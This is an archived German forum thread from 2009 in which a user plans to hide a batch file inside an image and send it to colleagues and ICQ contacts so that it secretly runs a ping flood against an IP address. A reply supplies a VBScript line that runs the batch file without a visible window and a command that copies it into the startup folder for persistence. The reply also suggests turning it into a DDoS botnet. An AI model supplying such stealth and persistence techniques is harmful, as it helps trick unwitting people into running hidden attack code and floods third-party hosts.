PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Cmd suche hide Befehl oder derartiges



rejoin
20.05.2009, 23:01
Hi,
mein Vorhaben ist es eine .bat Datei zuerstellen, diese zu verbreiten (An Kollegen bzw Leute in der ICQ Liste) diese werden z.B. ein Bild öffnen, die Batch Datei die miteingebunden ist wird geöffnet und nun möchte ich eigentlich:

ping XX.XX.XX.XX -t -l 15000

und anstatt das das CMD Fenster kommt, soll es gehiddet werden, dass nicht gleich jeder sieht, was mein Vorhaben ist...

Zylasty
21.05.2009, 00:33
Meinst du, dass die .bat ausgeführt wird, aber das kein Fenster angezeigt wird? Wenn ja, dann probier mal

WScript.CreateObject( "WScript.Shell" ).Run "DATEINAME.bat",0,0und als IRGENTEINDATEINAME.vbs speichern.
Wenn beides im selben Ordner ist einfach die *.vbs ausführen und die Batch Datei sollte ausgeführt werden!
Allerdings startet so ein Prozess namens "Wscript.exe", aber das sollte ja eigl niemandem aufallen!

Edit:
Versuchst du so jemanden zu Ddosen? xDD
Wenn ja mach es doch mit Autostart!

copy %0 %userprofile%\autostartkannst ja noch machen, dass es zu nem Webserver connected und schon haste ein Botnetz zum Ddosen per Batch xD
Wollte auch mal sowas machen, da ich nur QBasic und Batch befehle kenne und mir das nötige Wissen in C/c++/Java/Vb.. fehlt um es "professionell" zu machen :P Naja und ich bin bisschen faul :P

So könnte man ja theoretisch auch sein eigenes FUD haxx0r 1337 Rat machen, per Batch, damit das halt iwo hin Connected und und und....